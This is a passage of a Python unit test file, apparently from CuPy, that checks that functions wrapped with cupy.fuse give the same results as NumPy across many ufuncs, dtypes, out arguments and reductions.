@testing.for_int_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_binary_int(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=dtype)
b = xp.array([0, 1, 2, 3, 4, 5, 6], dtype=dtype)
return a, b
def test_bitwise_and(self):
self.check_binary_int('bitwise_and')
def test_bitwise_or(self):
self.check_binary_int('bitwise_or')
def test_bitwise_xor(self):
self.check_binary_int('bitwise_xor')
def test_invert(self):
self.check_unary_int('invert')
def test_left_shift(self):
self.check_binary_int('left_shift')
def test_right_shift(self):
self.check_binary_int('right_shift')
@testing.gpu
class TestFusionComparison(unittest.TestCase):
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
def test_greater(self):
self.check_binary('greater')
def test_greater_equal(self):
self.check_binary('greater_equal')
def test_less(self):
self.check_binary('less')
def test_less_equal(self):
self.check_binary('less_equal')
def test_not_equal(self):
self.check_binary('not_equal')
def test_equal(self):
self.check_binary('equal')
@testing.gpu
class TestFusionContent(unittest.TestCase):
@testing.for_float_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_unary_inf(self, name, xp, dtype):
a = xp.array([-3, dtype('inf'), -1, -dtype('inf'), 0, 1, 2],
dtype=dtype)
return (a,)
@testing.for_float_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_unary_nan(self, name, xp, dtype):
a = xp.array(
[-3, numpy.NAN, -1, numpy.NAN, 0, numpy.NAN, dtype('inf')],
dtype=dtype)
return (a,)
def test_isfinite(self):
self.check_unary_inf('isfinite')
def test_isinf(self):
self.check_unary_inf('isinf')
def test_isnan(self):
self.check_unary_nan('isnan')
@testing.gpu
class TestFusionOps(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
def test_logical_and(self):
self.check_binary('logical_and')
def test_logical_or(self):
self.check_binary('logical_or')
def test_logical_xor(self):
self.check_binary('logical_xor')
def test_logical_not(self):
self.check_unary('logical_not')
@testing.gpu
class TestFusionTrigonometric(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_dtypes(['e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_unit(self, name, xp, dtype):
a = xp.array([0.2, 0.4, 0.6, 0.8], dtype=dtype)
return (a,)
def test_sin(self):
self.check_unary('sin')
def test_cos(self):
self.check_unary('cos')
def test_tan(self):
self.check_unary('tan')
def test_arcsin(self):
self.check_unary_unit('arcsin')
def test_arccos(self):
self.check_unary_unit('arccos')
def test_arctan(self):
self.check_unary('arctan')
def test_arctan2(self):
self.check_binary('arctan2')
def test_hypot(self):
self.check_binary('hypot')
def test_deg2rad(self):
self.check_unary('deg2rad')
def test_rad2deg(self):
self.check_unary('rad2deg')
@testing.gpu
class TestFusionHyperbolic(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_dtypes(['e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_unit1(self, name, xp, dtype):
a = xp.array([1, 2, 3], dtype=dtype)
return (a,)
@testing.for_dtypes(['e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_unit2(self, name, xp, dtype):
a = xp.array([0.2, 0.4, 0.6, 0.8], dtype=dtype)
return (a,)
def test_sinh(self):
self.check_unary('sinh')
def test_cosh(self):
self.check_unary('cosh')
def test_tanh(self):
self.check_unary('tanh')
def test_arcsinh(self):
self.check_unary('arcsinh')
def test_arccosh(self):
self.check_unary_unit1('arccosh')
def test_arctanh(self):
self.check_unary_unit2('arctanh')
@testing.gpu
class TestFusionRounding(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_dtypes(['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_negative(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype)
return (a,)
def test_rint(self):
self.check_unary('rint')
def test_rint_negative(self):
self.check_unary_negative('rint')
def test_floor(self):
self.check_unary('floor')
def test_ceil(self):
self.check_unary('ceil')
def test_trunc(self):
self.check_unary('trunc')
def test_fix(self):
self.check_unary('fix')
@testing.gpu
class TestFusionExplog(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
def test_exp(self):
self.check_unary('exp')
def test_expm1(self):
self.check_unary('expm1')
def test_exp2(self):
self.check_unary('exp2')
def test_log(self):
with testing.NumpyError(divide='ignore'):
self.check_unary('log')
def test_log10(self):
with testing.NumpyError(divide='ignore'):
self.check_unary('log10')
def test_log2(self):
with testing.NumpyError(divide='ignore'):
self.check_unary('log2')
def test_log1p(self):
self.check_unary('log1p')
def test_logaddexp(self):
self.check_binary('logaddexp')
def test_logaddexp2(self):
self.check_binary('logaddexp2')
@testing.gpu
class TestFusionFloating(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_float_dtypes(name='ftype')
@testing.for_dtypes(['i', 'l'], name='itype')
@testing.numpy_cupy_allclose()
def test_ldexp(self, xp, ftype, itype):
a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=ftype)
b = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=itype)
@cupy.fuse()
def g(x, y):
return xp.ldexp(x, y)
return g(a, b)
def test_signbit(self):
self.check_unary('signbit')
def test_copysign(self):
self.check_binary('copysign')
@testing.for_float_dtypes()
def test_frexp(self, dtype):
numpy_a = numpy.array([-300, -20, -10, -1, 0, 1, 10, 20, 300],
dtype=dtype)
@cupy.fuse()
def g(x):
xp = cupy.get_array_module(x)
return xp.frexp(x)
numpy_b, numpy_c = g(numpy_a)
cupy_a = cupy.array(numpy_a)
cupy_b, cupy_c = g(cupy_a)
testing.assert_allclose(cupy_b, numpy_b)
testing.assert_array_equal(cupy_c, numpy_c)
def test_nextafter(self):
self.check_binary('nextafter')
@testing.gpu
class TestFusionArithmetic(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_all_dtypes_combination(
no_bool=True, no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_without_complex_bool(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_all_dtypes_combination(
no_bool=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_without_bool(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_dtypes(['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_negative(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype)
return (a,)
@testing.for_dtypes_combination(
['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'], names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_negative(self, name, xp, dtype1, dtype2):
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype1)
b = xp.array([4, 3, 2, 1, -1, -2], dtype=dtype2)
return a, b
@testing.for_dtypes_combination(
['e', 'f', 'd'], names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_negative_float(self, name, xp, dtype1, dtype2):
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype1)
b = xp.array([4, 3, 2, 1, -1, -2], dtype=dtype2)
return a, b
def test_add(self):
self.check_binary('add')
def test_reciprocal(self):
with testing.NumpyError(divide='ignore', invalid='ignore'):
self.check_unary('reciprocal')
def test_multiply(self):
self.check_binary('multiply')
def test_divide(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_bool('divide')
def test_divide_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('divide')
def test_power_negative(self):
self.check_binary_negative_float('power')
def test_subtract(self):
# TODO(unno): boolean subtract causes DeprecationWarning in numpy>=1.13
self.check_binary_without_bool('subtract')
def test_true_divide(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_bool('true_divide')
def test_true_divide_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('true_divide')
def test_floor_divide(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_complex_bool('floor_divide')
def test_floor_divide_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('floor_divide')
def test_fmod(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_complex_bool('fmod')
def test_fmod_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('fmod')
@testing.for_float_dtypes()
@testing.numpy_cupy_allclose()
def test_modf(self, xp, dtype):
a = xp.array([-2.5, -1.5, -0.5, 0, 0.5, 1.5, 2.5], dtype=dtype)
@cupy.fuse()
def g(x):
return xp.modf(x)
b, c = g(a)
d = xp.empty((2, 7), dtype=dtype)
d[0] = b
d[1] = c
return d
def test_remainder(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_complex_bool('remainder')
def test_remainder_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('remainder')
@testing.gpu
class TestFusionArithmeticLargeTolerance(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_no_complex(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype) + 1
b = testing.shaped_reverse_arange((2, 3), xp, dtype) + 1
return a, b
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(atol=1e-3)
@fusion_default_array_equal()
def check_binary_complex(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype) + 1
b = testing.shaped_reverse_arange((2, 3), xp, dtype) + 1
return a, b
def test_power(self):
self.check_binary_no_complex('power')
self.check_binary_complex('power')
class TestFusionUfunc(unittest.TestCase):
@cupy.fuse()
def sample_function(x, y, z):
xp = cupy.get_array_module(x, y, z)
return xp.square(xp.add(x, y))
def random_bool(self, seed=0):
return testing.shaped_random((3, 3),
xp=cupy,
dtype=numpy.bool_,
seed=seed)
def random_int(self, lower=-1000, higher=1000, seed=0):
return testing.shaped_random((3, 3),
xp=cupy,
dtype=numpy.int64,
scale=(higher - lower),
seed=seed) + lower
def random_real(self, lower=-1000, higher=1000, seed=0):
return testing.shaped_random((3, 3),
xp=cupy,
dtype=numpy.float64,
scale=(higher - lower),
seed=seed) + lower
def random_imag(self, lower=-1000, higher=1000, seed=0):
return testing.shaped_random((3, 3),
xp=cupy,
dtype=numpy.complex128,
scale=(higher - lower),
seed=seed) + lower
def check(self, func, n, gen, args=None):
if args is None:
args = ((),) * n
self._check(func, n, gen, args)
def _check(self, func, n, gen, args, error_types=None):
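# Runs ``func`` twice -- once as-is and once wrapped in cupy.fuse() -- on
# identical copies of the generated inputs, then checks that both calls
# either raise matching errors or produce matching results (return values
# and possibly-mutated input arrays alike).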
assert n == len(args), (n, args)
if error_types is None:
error_types = ()
f = cupy.fuse(func)
# Prepare input arrays
if not isinstance(gen, tuple):
gen = (gen,) * n
data0 = tuple([g(*a) for g, a in zip(gen, args)])
data1 = tuple([_.copy() for _ in data0])
# Invoke non-fused function
try:
ret0 = func(*data0) # Non-fused
err0 = None
except Exception as e:
if type(e) not in error_types:
raise
ret0 = None
err0 = e
# Invoke fused function
try:
ret1 = f(*data1) # Fused
err1 = None
except Exception as e:
if type(e) not in error_types:
raise
ret1 = None
err1 = e
self.assertEqual(err0 is None, err1 is None)
if err0 is not None:
# Error
self.assertEqual(type(err0), type(err1))
self.assertEqual(str(err0), str(err1))
arrs0 = None
arrs1 = None
else:
# Success
self.assertEqual(ret0 is None, ret1 is None)
if ret0 is None:
# Both return values are None
ret0 = ()
ret1 = ()
else:
# Return values must have the same type
self.assertEqual(type(ret0), type(ret1))
if not isinstance(ret0, tuple):
# Single arrays are returned
ret0 = (ret0,)
ret1 = (ret1,)
else:
# Tuples are returned
self.assertEqual(len(ret0), len(ret1))
# Concatenate return values and input arrays
arrs0 = ret0 + data0
arrs1 = ret1 + data1
# Test they have same values
for nf, f in zip(arrs0, arrs1):
numpy.testing.assert_array_almost_equal(nf.get(), f.get())
return err0 is not None, (arrs0, arrs1)
def check_reduce(self, func, n, reduce_f, gen, args=None):
if args is None:
args = ((),) * n
self._check_reduce(func, n, reduce_f, gen, args)
def _check_reduce(self, func, n, reduce_f, gen, args):
@cupy.fuse()
def f(*args):
return reduce_f(func(*args))
data = [gen(*a) for a in args]
ret0 = reduce_f(func(*data)) # Non-fused
ret1 = f(*data) # Fused
numpy.testing.assert_array_almost_equal(ret0.get(), ret1.get())
def test_setitem_ellipsis(self):
def func(x, y):
y[...] = x
return y
ret = self._check(
func, 2, self.random_int, ((2, 3),) * 2,
error_types=(TypeError,))
is_err, (arrs_n, arrs_f) = ret
if not is_err:
# The returned array and the assigned-to input y must both equal x
ret, x, y = arrs_f
testing.assert_array_equal(x, ret)
testing.assert_array_equal(x, y)
def test_setitem_none_slice(self):
def func(x, y):
y[:] = x
return y
ret = self._check(
func, 2, self.random_int, ((2, 3),) * 2,
error_types=(TypeError,))
is_err, (arrs_n, arrs_f) = ret
if not is_err:
# The returned array and the assigned-to input y must both equal x
ret, x, y = arrs_f
testing.assert_array_equal(x, ret)
testing.assert_array_equal(x, y)
@testing.for_all_dtypes_combination(
names=['src_dtype', 'dst_dtype'], full=True, no_complex=True)
def test_out_arg(self, src_dtype, dst_dtype):
def func(x, y, z):
return cupy.add(x, y, out=z)
dtypes = (src_dtype, src_dtype, dst_dtype)
ret = self._check(
func, 3,
lambda iarg: cupy.arange(6).astype(dtypes[iarg]).reshape((2, 3)),
[(_,) for _ in range(3)],
error_types=(TypeError,))
is_err, (arrs_n, arrs_f) = ret
if not is_err:
# The returned array must be equal to z
arr_ret = arrs_f[0]
arr_z = arrs_f[3]
testing.assert_array_equal(arr_ret, arr_z)
def test_out_arg2(self):
def func(x, y, z, u, v):
cupy.add(x, y, out=z)
cupy.subtract(z, x, out=u)
cupy.multiply(z, x, out=v)
return u
ret = self._check(
func, 5, self.random_int, ((),) * 5,
error_types=(TypeError,))
is_err, (arrs_n, arrs_f) = ret
# Must succeed
self.assertFalse(is_err)
# The returned array must be equal to u
arr_ret = arrs_f[0]
arr_u = arrs_f[4]
testing.assert_array_equal(arr_ret, arr_u)
def test_bitwise(self):
self.check(cupy.bitwise_and, 2, self.random_int)
self.check(cupy.bitwise_or, 2, self.random_int)
self.check(cupy.bitwise_xor, 2, self.random_int)
self.check(cupy.invert, 1, self.random_int)
self.check(cupy.left_shift, 2, self.random_int, ((0, 20),) * 2)
self.check(cupy.right_shift, 2, self.random_int, ((0, 20),) * 2)
def test_compare(self):
self.check(cupy.greater, 2, self.random_int)
self.check(cupy.greater_equal, 2, self.random_int)
self.check(cupy.less, 2, self.random_int)
self.check(cupy.less_equal, 2, self.random_int)
self.check(cupy.equal, 2, self.random_int)
self.check(cupy.not_equal, 2, self.random_int)
def test_logic_content(self):
self.check(cupy.isfinite, 1, self.random_real)
self.check(cupy.isinf, 1, self.random_real)
self.check(cupy.isnan, 1, self.random_real)
def test_logic_ops(self):
self.check(cupy.logical_and, 2, self.random_int, ((0, 2),) * 2)
self.check(cupy.logical_or, 2, self.random_int, ((0, 2),) * 2)
self.check(cupy.logical_not, 1, self.random_int, ((0, 2),))
self.check(cupy.logical_xor, 2, self.random_int, ((0, 2),) * 2)
def test_trigonometric(self):
self.check(cupy.sin, 1, self.random_real)
self.check(cupy.cos, 1, self.random_real)
self.check(cupy.tan, 1, self.random_real)
self.check(cupy.arcsin, 1, self.random_real, ((-1, 1),))
self.check(cupy.arccos, 1, self.random_real, ((-1, 1),))
self.check(cupy.arctan, 1, self.random_real)
self.check(cupy.hypot, 2, self.random_real)
self.check(cupy.deg2rad, 1, self.random_real)
self.check(cupy.rad2deg, 1, self.random_real)
self.check(cupy.degrees, 1, self.random_real)
self.check(cupy.radians, 1, self.random_real)
def test_hyperbolic(self):
self.check(cupy.sinh, 1, self.random_real, ((-10, 10),))
self.check(cupy.cosh, 1, self.random_real, ((-10, 10),))
self.check(cupy.tanh, 1, self.random_real, ((-10, 10),))
self.check(cupy.arcsinh, 1, self.random_real, ((-10, 10),))
self.check(cupy.arccosh, 1, self.random_real, ((1, 10),))
self.check(cupy.arctanh, 1, self.random_real, ((0, 1),))
def test_rounding(self):
self.check(cupy.rint, 1, self.random_real)
self.check(cupy.floor, 1, self.random_real)
self.check(cupy.ceil, 1, self.random_real)
self.check(cupy.trunc, 1, self.random_real)
def test_explog(self):
self.check(cupy.exp, 1, self.random_real, ((-10, 10),))
self.check(cupy.expm1, 1, self.random_real, ((-10, 10),))
self.check(cupy.exp2, 1, self.random_real, ((-10, 10),))
self.check(cupy.log, 1, self.random_real, ((0, 10),))
self.check(cupy.log10, 1, self.random_real, ((0, 10),))
self.check(cupy.log2, 1, self.random_real, ((0, 10),))
self.check(cupy.log1p, 1, self.random_real, ((-1, 10),))
self.check(cupy.logaddexp, 2, self.random_real, ((0, 10),) * 2)
self.check(cupy.logaddexp2, 2, self.random_real, ((0, 10),) * 2)
def test_special_func(self):
self.check(cupy.i0, 1, self.random_real)
self.check(cupy.sinc, 1, self.random_real)
def test_floating(self):
self.check(cupy.signbit, 1, self.random_real)
self.check(cupy.copysign, 2, self.random_real)
self.check(cupy.ldexp, 2, self.random_int, ((1, 10),) * 2)
self.check(cupy.frexp, 1, self.random_real, ((1, 1000),))
self.check(cupy.nextafter, 2, self.random_real)
def test_arithmetic(self):
self.check(cupy.add, 2, self.random_real)
self.check(cupy.reciprocal, 1, self.random_real)
self.check(cupy.negative, 1, self.random_real)
self.check(cupy.angle, 1, self.random_imag)
self.check(cupy.conj, 1, self.random_imag)
self.check(cupy.real, 1, self.random_imag)
self.check(cupy.imag, 1, self.random_imag)
self.check(cupy.multiply, 2, self.random_real)
self.check(cupy.divide, 2, self.random_real)
self.check(cupy.power, 2, self.random_real, ((0, 10),) * 2)
self.check(cupy.subtract, 2, self.random_real)
self.check(cupy.true_divide, 2, self.random_int, ((1, 1000),) * 2)
self.check(cupy.floor_divide, 2, self.random_real, ((1, 1000),) * 2)
self.check(cupy.fmod, 2, self.random_real)
self.check(cupy.mod, 2, self.random_int, ((1, 1000),) * 2)
self.check(cupy.modf, 1, self.random_real)
self.check(cupy.remainder, 2, self.random_int, ((1, 1000),) * 2)
@testing.with_requires('numpy>=1.13')
def test_divmod(self):
self.check(cupy.divmod, 2, self.random_real)
def test_misc(self):
self.check(cupy.sqrt, 1, self.random_real, ((0, 1000),))
self.check(cupy.cbrt, 1, self.random_real, ((0, 1000),))
self.check(cupy.square, 1, self.random_real)
self.check(cupy.absolute, 1, self.random_real)
self.check(cupy.abs, 1, self.random_real)
self.check(cupy.sign, 1, self.random_real)
self.check(cupy.maximum, 2, self.random_real)
self.check(cupy.minimum, 2, self.random_real)
self.check(cupy.fmax, 2, self.random_real)
self.check(cupy.fmin, 2, self.random_real)
def test_special(self):
self.check(cupy.where, 3,
(self.random_bool,
lambda *args: self.random_int(*args, seed=0),
lambda *args: self.random_int(*args, seed=1)),
((), (0, 100), (0, 100)))
self.check(cupy.clip, 3,
(lambda *args: self.random_real(*args, seed=0),
lambda *args: self.random_real(*args, seed=1),
lambda *args: self.random_real(*args, seed=2)),
((0, 1000), (0, 500), (500, 1000)))
self.check(cupy.around, 2,
(self.random_bool,
self.random_int,
self.random_real))
def test_reduce(self):
self.check_reduce(cupy.bitwise_and, 2, cupy.sum, self.random_int)
self.check_reduce(cupy.sqrt, 1, cupy.prod, self.random_int, ((1, 2),))
self.check_reduce(cupy.sqrt, 1, cupy.prod, self.random_real, ((1, 2),))
self.check_reduce(lambda x: x, 1, cupy.amax, self.random_int)
self.check_reduce(lambda x: x, 1, cupy.amin, self.random_int)
@testing.gpu
class TestFusionMisc(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
def check_unary(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = testing.shaped_arange((2, 3), xp, dtype)
@cupy.fuse()
def g(x):
return getattr(xp, name)(x)
return g(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
def check_binary(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = testing.shaped_arange((2, 3), xp, dtype)
b = testing.shaped_reverse_arange((2, 3), xp, dtype)
@cupy.fuse()
def g(x, y):
return getattr(xp, name)(x, y)
return g(a, b)
@testing.for_dtypes(['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
def check_unary_negative(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x):
return getattr(xp, name)(x)
return g(a)
@testing.for_float_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_binary_nan(self, name, xp, dtype):
a = xp.array([-3, numpy.NAN, -1, numpy.NAN, 0, numpy.NAN, 2],
dtype=dtype)
b = xp.array([numpy.NAN, numpy.NAN, 1, 0, numpy.NAN, -1, -2],
dtype=dtype)
return a, b
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_external_clip(self, xp, dtype):
a = testing.shaped_arange((2, 3, 4), xp, dtype)
@cupy.fuse()
def g(x, y, z):
return xp.clip(x, y, z)
ty = numpy.dtype(dtype).type
return g(a, ty(3), ty(13))
@testing.with_requires('numpy>=1.11.2')
def test_sqrt(self):
# numpy.sqrt is broken in numpy<1.11.2
self.check_unary('sqrt')
@testing.with_requires('numpy>=1.10')
def test_cbrt(self):
self.check_unary('cbrt')
def test_square(self):
self.check_unary('square')
def test_absolute(self):
self.check_unary('absolute')
def test_absolute_negative(self):
self.check_unary_negative('absolute')
def test_sign(self):
self.check_unary('sign', no_bool=True)
def test_sign_negative(self):
self.check_unary_negative('sign', no_bool=True)
def test_maximum(self):
self.check_binary('maximum')
def test_maximum_nan(self):
self.check_binary_nan('maximum')
def test_minimum(self):
self.check_binary('minimum')
def test_minimum_nan(self):
self.check_binary_nan('minimum')
def test_fmax(self):
self.check_binary('fmax')
def test_fmax_nan(self):
self.check_binary_nan('fmax')
def test_fmin(self):
self.check_binary('fmin')
def test_fmin_nan(self):
self.check_binary_nan('fmin')
@testing.for_all_dtypes_combination(
names=['src_dtype', 'dst_dtype'], no_complex=True)
@testing.numpy_cupy_array_equal()
def test_astype_class(self, xp, src_dtype, dst_dtype):
@cupy.fuse()
def f(x):
return x.astype(dst_dtype)
x = xp.arange(6).astype(src_dtype).reshape(2, 3)
return f(x)
@testing.gpu
class TestFusionFuse(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse1(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
w = x * y + z
(x, w) = (w, x)
return z * w + y + x
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse2(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
x += z
xp.add(x, y, z)
return z
return g(a, b, c)
@testing.for_all_dtypes(no_bool=True, no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse3(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
x = 10 + (-x) * (x - y) + 10
x = 2 * (100 - x - 30)
x = x / (y + 1 / y)
return z // x + x // z + 100 // x + 100 // z
return g(a, b, c)
@testing.for_int_dtypes()
@testing.numpy_cupy_array_equal()
def test_fuse4(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
x = x * y % z + 10 % x << x << y >> z
return x + (1 << y) + (1 << z) + (120 >> y) + (120 >> y)
return g(a, b, c)
@testing.for_int_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_fuse5(self, xp, dtype):
a = xp.arange(15, dtype=dtype)
b = a * a[::-1]
a = a * 3 + 11
c = (a * b) % 63
@cupy.fuse()
def g(x, y, z):
x = ~(x & y) | (x ^ z) ^ (z | y)
y = 109 & y
z = 109 | z
z = 88 ^ z
return x + y + z
return g(a, b, c)
@testing.for_int_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_fuse6(self, xp, dtype):
a = xp.arange(15, dtype=dtype)
b = a * a[::-1]
a = a * 3 + 11
c = (a * b) % 63
@cupy.fuse()
def g(x, y, z):
x = ~(x & y) | (x ^ z) ^ (z | y)
y &= 109
z |= 109
z ^= 88
return x + y + z
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse7(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
def toi(x):
return xp.where(x, 1, 0)
@cupy.fuse()
def g(p, q, r, s, t, u):
x = toi(p == q) + toi(r < s) + toi(t > u)
x += toi(p != r) + toi(q <= t) + toi(s >= u)
return x
return g(a, b, c, a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
